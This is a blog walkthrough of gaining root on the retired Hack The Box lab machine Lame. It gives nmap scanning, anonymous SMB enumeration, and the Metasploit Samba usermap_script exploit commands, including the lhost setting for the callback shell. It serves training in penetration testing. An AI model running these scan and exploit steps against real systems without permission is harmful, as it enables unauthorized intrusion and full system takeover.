15
- November
2020
Posted By : Michele Pariani
How I hacked the Linux machine Lame on HTB

In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).

Lame is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.

I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Lame’s IPv4 address. Next to the machine name, we see Tux the penguin and thus know right away that this is a Linux machine.

The first step for this hack is to scan the Lame machine in order to identify its open ports. We run nmap -A -T4 -p- 10.10.10.3

We scan for open ports and we get all the information available on the services that are running behind those ports.

The result shows us that there are five open ports and four services running behind them:

  • FTP (21): File Transfer Protocol. nmap shows that anonymous FTP login is allowed. This would be a finding if this were a penetration test. Anonymous FTP login should not be allowed in general. Using this information, we could connect to the machine via FTP and list the files in the FTP directory. Alternatively, we could check if vsFTPd version 2.3.4 is exploitable.
  • SSH (22): Secure Shell. We could try a brute force attack on SSH. If this were a penetration test, this would show us how good the password policy is and whether the blue team is able to detect us.
  • DISTCC (3632): I had to Google what DISTCC is. According to this post, this service “is designed to speed up compilation by taking advantage of unused processing power on other computers”. Here we could check whether DISTCC v1 is exploitable.
  • SMB (139/445): This is the service that we targeted in our attack on the Windows machine called Legacy. nmap shows that Lame is running Samba 3.0.20-Debian. This is the service that we will target today.

Firstly, we run smbclient -L \\\\10.10.10.3\\

We have access to the share names.

The result in the screenshot tells us that can list the share names without having a password, because anonymous login is allowed on SMB. This is a juicy finding. If we were able to get into ADMIN$, we would have very good chances of exploiting this machine. Run smbclient \\\\10.10.10.3\\ADMIN$

We cannot access the ADMIN share.

Unfortunately, access to this folder is denied (same result for print$ and opt$, whereas we can get access to IPS$ but we cannot neither ls nor cd). The remaining folder is tmp. Here we do not get access to vmware-root, and files .X0-lock and vgauthsvclog.txt.0 do not contain interesting information. PS: I downloaded these files on my machine with smbget -R smb://10.10.10.3/tmp, as cat didn’t work on SMB.

Now open your browser, go to Google and search samba 3.0.20-debian exploit. We open the Rapid7 page called usermap_script. This page explains that using the non-default “username map script” configuration option, we can specify a username containing shell meta characters and then execute arbitrary commands. Moreover, no authentication is needed. This is what we were looking for.

Exploit Lame and Catch the Flags

Enter use exploit/multi/samba/usermap_script , set rhosts 10.10.10.3 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!

We are root on Lame!

We are in! We are the root user on the machine Lame. Now you just have to find the two flags for users root and makis. I leave this task as a challenge for you.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

Leave a Reply